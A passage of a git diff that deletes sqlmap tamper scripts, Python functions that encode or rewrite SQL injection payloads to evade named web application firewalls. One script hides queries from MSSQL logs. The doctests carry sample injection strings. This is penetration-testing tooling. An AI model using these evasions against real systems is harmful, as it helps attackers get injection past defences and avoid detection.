- Afterwards replace character = with LIKE operator - - Requirement: - * Blue Coat SGOS with WAF activated as documented in - https://kb.bluecoat.com/index?page=content&id=FAQ2147 - - Tested against: - * MySQL 5.1, SGOS - - Notes: - * Useful to bypass Blue Coat's recommended WAF rule configuration - - >>> tamper('SELECT id FROM users WHERE id = 1') - 'SELECT%09id FROM%09users WHERE%09id LIKE 1' - """ - - def process(match): - word = match.group('word') - if word.upper() in kb.keywords: - return match.group().replace(word, "%s%%09" % word) - else: - return match.group() - - retVal = payload - - if payload: - retVal = re.sub(r"\b(?P[A-Z_]+)(?=[^\w(]|\Z)", lambda match: process(match), retVal) - retVal = re.sub(r"\s*=\s*", " LIKE ", retVal) - retVal = retVal.replace("%09 ", "%09") - - return retVal diff --git a/tamper/chardoubleencode.py b/tamper/chardoubleencode.py deleted file mode 100644 index f7d6b31c..00000000 --- a/tamper/chardoubleencode.py +++ /dev/null @@ -1,45 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import string - -from lib.core.enums import PRIORITY - -__priority__ = PRIORITY.LOW - -def dependencies(): - pass - -def tamper(payload, **kwargs): - """ - Double url-encodes all characters in a given payload (not processing - already encoded) - - Notes: - * Useful to bypass some weak web application firewalls that do not - double url-decode the request before processing it through their - ruleset - - >>> tamper('SELECT FIELD FROM%20TABLE') - '%2553%2545%254C%2545%2543%2554%2520%2546%2549%2545%254C%2544%2520%2546%2552%254F%254D%2520%2554%2541%2542%254C%2545' - """ - - retVal = payload - - if payload: - retVal = "" - i = 0 - - while i < len(payload): - if payload[i] == '%' and (i < len(payload) - 2) and payload[i + 1:i + 2] in string.hexdigits and payload[i + 2:i + 3] in string.hexdigits: - retVal += '%%25%s' % payload[i + 1:i + 3] - i += 3 - 
else: - retVal += '%%25%.2X' % ord(payload[i]) - i += 1 - - return retVal diff --git a/tamper/charencode.py b/tamper/charencode.py deleted file mode 100644 index 4345eb35..00000000 --- a/tamper/charencode.py +++ /dev/null @@ -1,52 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import string - -from lib.core.enums import PRIORITY - -__priority__ = PRIORITY.LOWEST - -def dependencies(): - pass - -def tamper(payload, **kwargs): - """ - Url-encodes all characters in a given payload (not processing already - encoded) - - Tested against: - * Microsoft SQL Server 2005 - * MySQL 4, 5.0 and 5.5 - * Oracle 10g - * PostgreSQL 8.3, 8.4, 9.0 - - Notes: - * Useful to bypass very weak web application firewalls that do not - url-decode the request before processing it through their ruleset - * The web server will anyway pass the url-decoded version behind, - hence it should work against any DBMS - - >>> tamper('SELECT FIELD FROM%20TABLE') - '%53%45%4C%45%43%54%20%46%49%45%4C%44%20%46%52%4F%4D%20%54%41%42%4C%45' - """ - - retVal = payload - - if payload: - retVal = "" - i = 0 - - while i < len(payload): - if payload[i] == '%' and (i < len(payload) - 2) and payload[i + 1:i + 2] in string.hexdigits and payload[i + 2:i + 3] in string.hexdigits: - retVal += payload[i:i + 3] - i += 3 - else: - retVal += '%%%.2X' % ord(payload[i]) - i += 1 - - return retVal diff --git a/tamper/charunicodeencode.py b/tamper/charunicodeencode.py deleted file mode 100644 index f811578d..00000000 --- a/tamper/charunicodeencode.py +++ /dev/null @@ -1,57 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import os -import string - -from lib.core.enums import PRIORITY -from lib.core.common import singleTimeWarnMessage - -__priority__ = PRIORITY.LOWEST - -def dependencies(): - 
singleTimeWarnMessage("tamper script '%s' is only meant to be run against ASP or ASP.NET web applications" % os.path.basename(__file__).split(".")[0]) - -def tamper(payload, **kwargs): - """ - Unicode-url-encodes non-encoded characters in a given payload (not - processing already encoded) - - Requirement: - * ASP - * ASP.NET - - Tested against: - * Microsoft SQL Server 2000 - * Microsoft SQL Server 2005 - * MySQL 5.1.56 - * PostgreSQL 9.0.3 - - Notes: - * Useful to bypass weak web application firewalls that do not - unicode url-decode the request before processing it through their - ruleset - - >>> tamper('SELECT FIELD%20FROM TABLE') - '%u0053%u0045%u004C%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004C%u0044%u0020%u0046%u0052%u004F%u004D%u0020%u0054%u0041%u0042%u004C%u0045' - """ - - retVal = payload - - if payload: - retVal = "" - i = 0 - - while i < len(payload): - if payload[i] == '%' and (i < len(payload) - 2) and payload[i + 1:i + 2] in string.hexdigits and payload[i + 2:i + 3] in string.hexdigits: - retVal += "%%u00%s" % payload[i + 1:i + 3] - i += 3 - else: - retVal += '%%u%.4X' % ord(payload[i]) - i += 1 - - return retVal diff --git a/tamper/commalessmid.py b/tamper/commalessmid.py deleted file mode 100644 index 6bc771a2..00000000 --- a/tamper/commalessmid.py +++ /dev/null @@ -1,43 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import os -import re - -from lib.core.common import singleTimeWarnMessage -from lib.core.enums import PRIORITY - -__priority__ = PRIORITY.HIGH - -def dependencies(): - pass - -def tamper(payload, **kwargs): - """ - Replaces instances like 'MID(A, B, C)' with 'MID(A FROM B FOR C)' - - Requirement: - * MySQL - - Tested against: - * MySQL 5.0 and 5.5 - - >>> tamper('MID(VERSION(), 1, 1)') - 'MID(VERSION() FROM 1 FOR 1)' - """ - - retVal = payload - - warnMsg = "you should consider usage of switch '--no-cast' along with " - 
warnMsg += "tamper script '%s'" % os.path.basename(__file__).split(".")[0] - singleTimeWarnMessage(warnMsg) - - match = re.search(r"(?i)MID\((.+?)\s*,\s*(\d+)\s*\,\s*(\d+)\s*\)", payload or "") - if match: - retVal = retVal.replace(match.group(0), "MID(%s FROM %s FOR %s)" % (match.group(1), match.group(2), match.group(3))) - - return retVal diff --git a/tamper/concat2concatws.py b/tamper/concat2concatws.py deleted file mode 100644 index d46321f9..00000000 --- a/tamper/concat2concatws.py +++ /dev/null @@ -1,36 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from lib.core.enums import PRIORITY - -__priority__ = PRIORITY.HIGHEST - -def dependencies(): - pass - -def tamper(payload, **kwargs): - """ - Replaces instances like 'CONCAT(A, B)' with 'CONCAT_WS(MID(CHAR(0), 0, 0), A, B)' - - Requirement: - * MySQL - - Tested against: - * MySQL 5.0 - - Notes: - * Useful to bypass very weak and bespoke web application firewalls - that filter the CONCAT() function - - >>> tamper('CONCAT(1,2)') - 'CONCAT_WS(MID(CHAR(0),0,0),1,2)' - """ - - if payload: - payload = payload.replace("CONCAT(", "CONCAT_WS(MID(CHAR(0),0,0),") - - return payload diff --git a/tamper/equaltolike.py b/tamper/equaltolike.py deleted file mode 100644 index 49f19100..00000000 --- a/tamper/equaltolike.py +++ /dev/null @@ -1,43 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import os -import re - -from lib.core.common import singleTimeWarnMessage -from lib.core.enums import DBMS -from lib.core.enums import PRIORITY - -__priority__ = PRIORITY.HIGHEST - -def dependencies(): - singleTimeWarnMessage("tamper script '%s' is unlikely to work against %s" % (os.path.basename(__file__).split(".")[0], DBMS.PGSQL)) - -def tamper(payload, **kwargs): - """ - Replaces all occurances of operator equal 
('=') with operator 'LIKE' - - Tested against: - * Microsoft SQL Server 2005 - * MySQL 4, 5.0 and 5.5 - - Notes: - * Useful to bypass weak and bespoke web application firewalls that - filter the equal character ('=') - * The LIKE operator is SQL standard. Hence, this tamper script - should work against all (?) databases - - >>> tamper('SELECT * FROM users WHERE id=1') - 'SELECT * FROM users WHERE id LIKE 1' - """ - - retVal = payload - - if payload: - retVal = re.sub(r"\s*=\s*", " LIKE ", retVal) - - return retVal diff --git a/tamper/escapequotes.py b/tamper/escapequotes.py deleted file mode 100644 index 5a3acadf..00000000 --- a/tamper/escapequotes.py +++ /dev/null @@ -1,26 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import base64 - -from lib.core.enums import PRIORITY -from lib.core.settings import UNICODE_ENCODING - -__priority__ = PRIORITY.LOWEST - -def dependencies(): - pass - -def tamper(payload, **kwargs): - """ - Slash escape quotes (' and ") - - >>> tamper('1" AND SLEEP(5)#') - '1\\\\" AND SLEEP(5)#' - """ - - return payload.replace("'", "\\'").replace('"', '\\"') diff --git a/tamper/greatest.py b/tamper/greatest.py deleted file mode 100644 index 50138315..00000000 --- a/tamper/greatest.py +++ /dev/null @@ -1,45 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import re - -from lib.core.enums import PRIORITY - -__priority__ = PRIORITY.HIGHEST - -def dependencies(): - pass - -def tamper(payload, **kwargs): - """ - Replaces greater than operator ('>') with 'GREATEST' counterpart - - Tested against: - * MySQL 4, 5.0 and 5.5 - * Oracle 10g - * PostgreSQL 8.3, 8.4, 9.0 - - Notes: - * Useful to bypass weak and bespoke web application firewalls that - filter the greater than character - * The GREATEST clause is a widespread SQL command. 
Hence, this - tamper script should work against majority of databases - - >>> tamper('1 AND A > B') - '1 AND GREATEST(A,B+1)=A' - """ - - retVal = payload - - if payload: - match = re.search(r"(?i)(\b(AND|OR)\b\s+)(?!.*\b(AND|OR)\b)([^>]+?)\s*>\s*([^>#-]+)", payload) - - if match: - _ = "%sGREATEST(%s,%s+1)=%s" % (match.group(1), match.group(4), match.group(5), match.group(4)) - retVal = retVal.replace(match.group(0), _) - - return retVal diff --git a/tamper/halfversionedmorekeywords.py b/tamper/halfversionedmorekeywords.py deleted file mode 100644 index 430103fb..00000000 --- a/tamper/halfversionedmorekeywords.py +++ /dev/null @@ -1,55 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import os -import re - -from lib.core.common import singleTimeWarnMessage -from lib.core.data import kb -from lib.core.enums import DBMS -from lib.core.enums import PRIORITY -from lib.core.settings import IGNORE_SPACE_AFFECTED_KEYWORDS - -__priority__ = PRIORITY.HIGHER - -def dependencies(): - singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s < 5.1" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL)) - -def tamper(payload, **kwargs): - """ - Adds versioned MySQL comment before each keyword - - Requirement: - * MySQL < 5.1 - - Tested against: - * MySQL 4.0.18, 5.0.22 - - Notes: - * Useful to bypass several web application firewalls when the - back-end database management system is MySQL - * Used during the ModSecurity SQL injection challenge, - http://modsecurity.org/demo/challenge.html - - >>> tamper("value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa") - 
"value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!0AND 'QDWa'='QDWa" - """ - - def process(match): - word = match.group('word') - if word.upper() in kb.keywords and word.upper() not in IGNORE_SPACE_AFFECTED_KEYWORDS: - return match.group().replace(word, "/*!0%s" % word) - else: - return match.group() - - retVal = payload - - if payload: - retVal = re.sub(r"(?<=\W)(?P[A-Za-z_]+)(?=\W|\Z)", lambda match: process(match), retVal) - retVal = retVal.replace(" /*!0", "/*!0") - - return retVal diff --git a/tamper/ifnull2ifisnull.py b/tamper/ifnull2ifisnull.py deleted file mode 100644 index 03d422ab..00000000 --- a/tamper/ifnull2ifisnull.py +++ /dev/null @@ -1,63 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from lib.core.enums import PRIORITY - -__priority__ = PRIORITY.HIGHEST - -def dependencies(): - pass - -def tamper(payload, **kwargs): - """ - Replaces instances like 'IFNULL(A, B)' with 'IF(ISNULL(A), B, A)' - - Requirement: - * MySQL - * SQLite (possibly) - * SAP MaxDB (possibly) - - Tested against: - * MySQL 5.0 and 5.5 - - Notes: - * Useful to bypass very weak and bespoke web application firewalls - that filter the IFNULL() function - - >>> tamper('IFNULL(1, 2)') - 'IF(ISNULL(1),2,1)' - """ - - if payload and payload.find("IFNULL") > -1: - while payload.find("IFNULL(") > -1: - index = payload.find("IFNULL(") - depth = 1 - comma, end = None, None - - for i in xrange(index + len("IFNULL("), len(payload)): - if depth == 1 and payload[i] == ',': - comma = i - - elif depth == 1 and payload[i] == ')': - end = i - break - - elif payload[i] == '(': - depth += 1 - - elif payload[i] == ')': - depth -= 1 - - if comma and end: - _ = payload[index + len("IFNULL("):comma] - __ = payload[comma + 1:end].lstrip() - newVal = 
"IF(ISNULL(%s),%s,%s)" % (_, __, _) - payload = payload[:index] + newVal + payload[end + 1:] - else: - break - - return payload diff --git a/tamper/informationschemacomment.py b/tamper/informationschemacomment.py deleted file mode 100644 index 58ed7318..00000000 --- a/tamper/informationschemacomment.py +++ /dev/null @@ -1,27 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import re - -from lib.core.enums import PRIORITY - -__priority__ = PRIORITY.LOW - -def tamper(payload, **kwargs): - """ - Add a comment to the end of all occurrences of (blacklisted) "information_schema" identifier - - >>> tamper('SELECT table_name FROM INFORMATION_SCHEMA.TABLES') - 'SELECT table_name FROM INFORMATION_SCHEMA/**/.TABLES' - """ - - retVal = payload - - if payload: - retVal = re.sub(r"(?i)(information_schema)\.", "\g<1>/**/.", payload) - - return retVal diff --git a/tamper/lowercase.py b/tamper/lowercase.py deleted file mode 100644 index 93ed2150..00000000 --- a/tamper/lowercase.py +++ /dev/null @@ -1,46 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import re - -from lib.core.data import kb -from lib.core.enums import PRIORITY - -__priority__ = PRIORITY.NORMAL - -def dependencies(): - pass - -def tamper(payload, **kwargs): - """ - Replaces each keyword character with lower case value - - Tested against: - * Microsoft SQL Server 2005 - * MySQL 4, 5.0 and 5.5 - * Oracle 10g - * PostgreSQL 8.3, 8.4, 9.0 - - Notes: - * Useful to bypass very weak and bespoke web application firewalls - that has poorly written permissive regular expressions - * This tamper script should work against all (?) 
databases - - >>> tamper('INSERT') - 'insert' - """ - - retVal = payload - - if payload: - for match in re.finditer(r"[A-Za-z_]+", retVal): - word = match.group() - - if word.upper() in kb.keywords: - retVal = retVal.replace(word, word.lower()) - - return retVal diff --git a/tamper/modsecurityversioned.py b/tamper/modsecurityversioned.py deleted file mode 100644 index a904d51e..00000000 --- a/tamper/modsecurityversioned.py +++ /dev/null @@ -1,47 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from lib.core.common import randomInt -from lib.core.enums import PRIORITY - -__priority__ = PRIORITY.HIGHER - -def dependencies(): - pass - -def tamper(payload, **kwargs): - """ - Embraces complete query with versioned comment - - Requirement: - * MySQL - - Tested against: - * MySQL 5.0 - - Notes: - * Useful to bypass ModSecurity WAF/IDS - - >>> import random - >>> random.seed(0) - >>> tamper('1 AND 2>1--') - '1 /*!30874AND 2>1*/--' - """ - - retVal = payload - - if payload: - postfix = '' - for comment in ('#', '--', '/*'): - if comment in payload: - postfix = payload[payload.find(comment):] - payload = payload[:payload.find(comment)] - break - if ' ' in payload: - retVal = "%s /*!30%s%s*/%s" % (payload[:payload.find(' ')], randomInt(3), payload[payload.find(' ') + 1:], postfix) - - return retVal diff --git a/tamper/modsecurityzeroversioned.py b/tamper/modsecurityzeroversioned.py deleted file mode 100644 index 7de6e440..00000000 --- a/tamper/modsecurityzeroversioned.py +++ /dev/null @@ -1,44 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from lib.core.enums import PRIORITY - -__priority__ = PRIORITY.HIGHER - -def dependencies(): - pass - -def tamper(payload, **kwargs): - """ - Embraces complete query with zero-versioned comment - - Requirement: - * 
MySQL - - Tested against: - * MySQL 5.0 - - Notes: - * Useful to bypass ModSecurity WAF/IDS - - >>> tamper('1 AND 2>1--') - '1 /*!00000AND 2>1*/--' - """ - - retVal = payload - - if payload: - postfix = '' - for comment in ('#', '--', '/*'): - if comment in payload: - postfix = payload[payload.find(comment):] - payload = payload[:payload.find(comment)] - break - if ' ' in payload: - retVal = "%s /*!00000%s*/%s" % (payload[:payload.find(' ')], payload[payload.find(' ') + 1:], postfix) - - return retVal diff --git a/tamper/multiplespaces.py b/tamper/multiplespaces.py deleted file mode 100644 index e44758d6..00000000 --- a/tamper/multiplespaces.py +++ /dev/null @@ -1,49 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import random -import re - -from lib.core.data import kb -from lib.core.enums import PRIORITY - -__priority__ = PRIORITY.NORMAL - -def dependencies(): - pass - -def tamper(payload, **kwargs): - """ - Adds multiple spaces around SQL keywords - - Notes: - * Useful to bypass very weak and bespoke web application firewalls - that has poorly written permissive regular expressions - - Reference: https://www.owasp.org/images/7/74/Advanced_SQL_Injection.ppt - - >>> random.seed(0) - >>> tamper('1 UNION SELECT foobar') - '1 UNION SELECT foobar' - """ - - retVal = payload - - if payload: - words = set() - - for match in re.finditer(r"[A-Za-z_]+", payload): - word = match.group() - - if word.upper() in kb.keywords: - words.add(word) - - for word in words: - retVal = re.sub("(?<=\W)%s(?=[^A-Za-z_(]|\Z)" % word, "%s%s%s" % (' ' * random.randrange(1, 4), word, ' ' * random.randrange(1, 4)), retVal) - retVal = re.sub("(?<=\W)%s(?=[(])" % word, "%s%s" % (' ' * random.randrange(1, 4), word), retVal) - - return retVal diff --git a/tamper/nonrecursivereplacement.py b/tamper/nonrecursivereplacement.py deleted file mode 100644 index 7b46a35d..00000000 --- 
a/tamper/nonrecursivereplacement.py +++ /dev/null @@ -1,41 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import random -import re - -from lib.core.common import singleTimeWarnMessage -from lib.core.enums import PRIORITY - -__priority__ = PRIORITY.NORMAL - -def tamper(payload, **kwargs): - """ - Replaces predefined SQL keywords with representations - suitable for replacement (e.g. .replace("SELECT", "")) filters - - Notes: - * Useful to bypass very weak custom filters - - >>> random.seed(0) - >>> tamper('1 UNION SELECT 2--') - '1 UNIOUNIONN SELESELECTCT 2--' - """ - - keywords = ("UNION", "SELECT", "INSERT", "UPDATE", "FROM", "WHERE") - retVal = payload - - warnMsg = "currently only couple of keywords are being processed %s. " % str(keywords) - warnMsg += "You can set it manually according to your needs" - singleTimeWarnMessage(warnMsg) - - if payload: - for keyword in keywords: - _ = random.randint(1, len(keyword) - 1) - retVal = re.sub(r"(?i)\b%s\b" % keyword, "%s%s%s" % (keyword[:_], keyword, keyword[_:]), retVal) - - return retVal diff --git a/tamper/overlongutf8.py b/tamper/overlongutf8.py deleted file mode 100644 index 03b9f193..00000000 --- a/tamper/overlongutf8.py +++ /dev/null @@ -1,45 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import string - -from lib.core.enums import PRIORITY - -__priority__ = PRIORITY.LOWEST - -def dependencies(): - pass - -def tamper(payload, **kwargs): - """ - Converts all characters in a given payload (not processing already - encoded) - - Reference: https://www.acunetix.com/vulnerabilities/unicode-transformation-issues/ - - >>> tamper('SELECT FIELD FROM TABLE WHERE 2>1') - 'SELECT%C0%AAFIELD%C0%AAFROM%C0%AATABLE%C0%AAWHERE%C0%AA2%C0%BE1' - """ - - retVal = payload - - if payload: - retVal = "" - i = 0 - 
- while i < len(payload): - if payload[i] == '%' and (i < len(payload) - 2) and payload[i + 1:i + 2] in string.hexdigits and payload[i + 2:i + 3] in string.hexdigits: - retVal += payload[i:i + 3] - i += 3 - else: - if payload[i] not in (string.ascii_letters + string.digits): - retVal += "%%C0%%%.2X" % (0x8A | ord(payload[i])) - else: - retVal += payload[i] - i += 1 - - return retVal diff --git a/tamper/percentage.py b/tamper/percentage.py deleted file mode 100644 index dfce2b39..00000000 --- a/tamper/percentage.py +++ /dev/null @@ -1,53 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import os -import string - -from lib.core.enums import PRIORITY -from lib.core.common import singleTimeWarnMessage - -__priority__ = PRIORITY.LOW - -def dependencies(): - singleTimeWarnMessage("tamper script '%s' is only meant to be run against ASP web applications" % os.path.basename(__file__).split(".")[0]) - -def tamper(payload, **kwargs): - """ - Adds a percentage sign ('%') infront of each character - - Requirement: - * ASP - - Tested against: - * Microsoft SQL Server 2000, 2005 - * MySQL 5.1.56, 5.5.11 - * PostgreSQL 9.0 - - Notes: - * Useful to bypass weak and bespoke web application firewalls - - >>> tamper('SELECT FIELD FROM TABLE') - '%S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E' - """ - - if payload: - retVal = "" - i = 0 - - while i < len(payload): - if payload[i] == '%' and (i < len(payload) - 2) and payload[i + 1:i + 2] in string.hexdigits and payload[i + 2:i + 3] in string.hexdigits: - retVal += payload[i:i + 3] - i += 3 - elif payload[i] != ' ': - retVal += '%%%s' % payload[i] - i += 1 - else: - retVal += payload[i] - i += 1 - - return retVal diff --git a/tamper/randomcase.py b/tamper/randomcase.py deleted file mode 100644 index c4a353f1..00000000 --- a/tamper/randomcase.py +++ /dev/null @@ -1,58 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 
sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import re - -from lib.core.common import randomRange -from lib.core.data import kb -from lib.core.enums import PRIORITY - -__priority__ = PRIORITY.NORMAL - -def dependencies(): - pass - -def tamper(payload, **kwargs): - """ - Replaces each keyword character with random case value - - Tested against: - * Microsoft SQL Server 2005 - * MySQL 4, 5.0 and 5.5 - * Oracle 10g - * PostgreSQL 8.3, 8.4, 9.0 - - Notes: - * Useful to bypass very weak and bespoke web application firewalls - that has poorly written permissive regular expressions - * This tamper script should work against all (?) databases - - >>> import random - >>> random.seed(0) - >>> tamper('INSERT') - 'INseRt' - """ - - retVal = payload - - if payload: - for match in re.finditer(r"[A-Za-z_]+", retVal): - word = match.group() - - if word.upper() in kb.keywords: - while True: - _ = "" - - for i in xrange(len(word)): - _ += word[i].upper() if randomRange(0, 1) else word[i].lower() - - if len(_) > 1 and _ not in (_.lower(), _.upper()): - break - - retVal = retVal.replace(word, _) - - return retVal diff --git a/tamper/randomcomments.py b/tamper/randomcomments.py deleted file mode 100644 index 03d6710e..00000000 --- a/tamper/randomcomments.py +++ /dev/null @@ -1,49 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import re - -from lib.core.common import randomRange -from lib.core.data import kb -from lib.core.enums import PRIORITY - -__priority__ = PRIORITY.LOW - -def tamper(payload, **kwargs): - """ - Add random comments to SQL keywords - - >>> import random - >>> random.seed(0) - >>> tamper('INSERT') - 'I/**/N/**/SERT' - """ - - retVal = payload - - if payload: - for match in re.finditer(r"\b[A-Za-z_]+\b", payload): - word = match.group() - - if len(word) < 2: - continue - - if word.upper() in kb.keywords: 
- _ = word[0] - - for i in xrange(1, len(word) - 1): - _ += "%s%s" % ("/**/" if randomRange(0, 1) else "", word[i]) - - _ += word[-1] - - if "/**/" not in _: - index = randomRange(1, len(word) - 1) - _ = word[:index] + "/**/" + word[index:] - - retVal = retVal.replace(word, _) - - return retVal diff --git a/tamper/securesphere.py b/tamper/securesphere.py deleted file mode 100644 index 4eec056f..00000000 --- a/tamper/securesphere.py +++ /dev/null @@ -1,27 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from lib.core.enums import PRIORITY - -__priority__ = PRIORITY.NORMAL - -def dependencies(): - pass - -def tamper(payload, **kwargs): - """ - Appends special crafted string - - Notes: - * Useful for bypassing Imperva SecureSphere WAF - * Reference: http://seclists.org/fulldisclosure/2011/May/163 - - >>> tamper('1 AND 1=1') - "1 AND 1=1 and '0having'='0having'" - """ - - return payload + " and '0having'='0having'" if payload else payload diff --git a/tamper/sp_password.py b/tamper/sp_password.py deleted file mode 100644 index 466dc221..00000000 --- a/tamper/sp_password.py +++ /dev/null @@ -1,32 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from lib.core.enums import PRIORITY - -__priority__ = PRIORITY.HIGH - -def tamper(payload, **kwargs): - """ - Appends 'sp_password' to the end of the payload for automatic obfuscation from DBMS logs - - Requirement: - * MSSQL - - Notes: - * Appending sp_password to the end of the query will hide it from T-SQL logs as a security measure - * Reference: http://websec.ca/kb/sql_injection - - >>> tamper('1 AND 9227=9227-- ') - '1 AND 9227=9227-- sp_password' - """ - - retVal = "" - - if payload: - retVal = "%s%ssp_password" % (payload, "-- " if not any(_ if _ in payload else None for _ in ('#', "-- ")) else "") - - 
return retVal diff --git a/tamper/space2comment.py b/tamper/space2comment.py deleted file mode 100644 index fbc035d4..00000000 --- a/tamper/space2comment.py +++ /dev/null @@ -1,57 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from lib.core.enums import PRIORITY - -__priority__ = PRIORITY.LOW - -def dependencies(): - pass - -def tamper(payload, **kwargs): - """ - Replaces space character (' ') with comments '/**/' - - Tested against: - * Microsoft SQL Server 2005 - * MySQL 4, 5.0 and 5.5 - * Oracle 10g - * PostgreSQL 8.3, 8.4, 9.0 - - Notes: - * Useful to bypass weak and bespoke web application firewalls - - >>> tamper('SELECT id FROM users') - 'SELECT/**/id/**/FROM/**/users' - """ - - retVal = payload - - if payload: - retVal = "" - quote, doublequote, firstspace = False, False, False - - for i in xrange(len(payload)): - if not firstspace: - if payload[i].isspace(): - firstspace = True - retVal += "/**/" - continue - - elif payload[i] == '\'': - quote = not quote - - elif payload[i] == '"': - doublequote = not doublequote - - elif payload[i] == " " and not doublequote and not quote: - retVal += "/**/" - continue - - retVal += payload[i] - - return retVal diff --git a/tamper/space2dash.py b/tamper/space2dash.py deleted file mode 100644 index b0d0305a..00000000 --- a/tamper/space2dash.py +++ /dev/null @@ -1,47 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import random -import string - -from lib.core.enums import PRIORITY - -__priority__ = PRIORITY.LOW - -def tamper(payload, **kwargs): - """ - Replaces space character (' ') with a dash comment ('--') followed by - a random string and a new line ('\n') - - Requirement: - * MSSQL - * SQLite - - Notes: - * Useful to bypass several web application firewalls - * Used during the ZeroNights SQL 
injection challenge, - https://proton.onsec.ru/contest/ - - >>> random.seed(0) - >>> tamper('1 AND 9227=9227') - '1--nVNaVoPYeva%0AAND--ngNvzqu%0A9227=9227' - """ - - retVal = "" - - if payload: - for i in xrange(len(payload)): - if payload[i].isspace(): - randomStr = ''.join(random.choice(string.ascii_uppercase + string.ascii_lowercase) for _ in xrange(random.randint(6, 12))) - retVal += "--%s%%0A" % randomStr - elif payload[i] == '#' or payload[i:i + 3] == '-- ': - retVal += payload[i:] - break - else: - retVal += payload[i] - - return retVal diff --git a/tamper/space2hash.py b/tamper/space2hash.py deleted file mode 100644 index 89a17da8..00000000 --- a/tamper/space2hash.py +++ /dev/null @@ -1,55 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import os -import random -import string - -from lib.core.common import singleTimeWarnMessage -from lib.core.enums import DBMS -from lib.core.enums import PRIORITY - -__priority__ = PRIORITY.LOW - -def dependencies(): - singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL)) - -def tamper(payload, **kwargs): - """ - Replaces space character (' ') with a pound character ('#') followed by - a random string and a new line ('\n') - - Requirement: - * MySQL - - Tested against: - * MySQL 4.0, 5.0 - - Notes: - * Useful to bypass several web application firewalls - * Used during the ModSecurity SQL injection challenge, - http://modsecurity.org/demo/challenge.html - - >>> random.seed(0) - >>> tamper('1 AND 9227=9227') - '1%23nVNaVoPYeva%0AAND%23ngNvzqu%0A9227=9227' - """ - - retVal = "" - - if payload: - for i in xrange(len(payload)): - if payload[i].isspace(): - 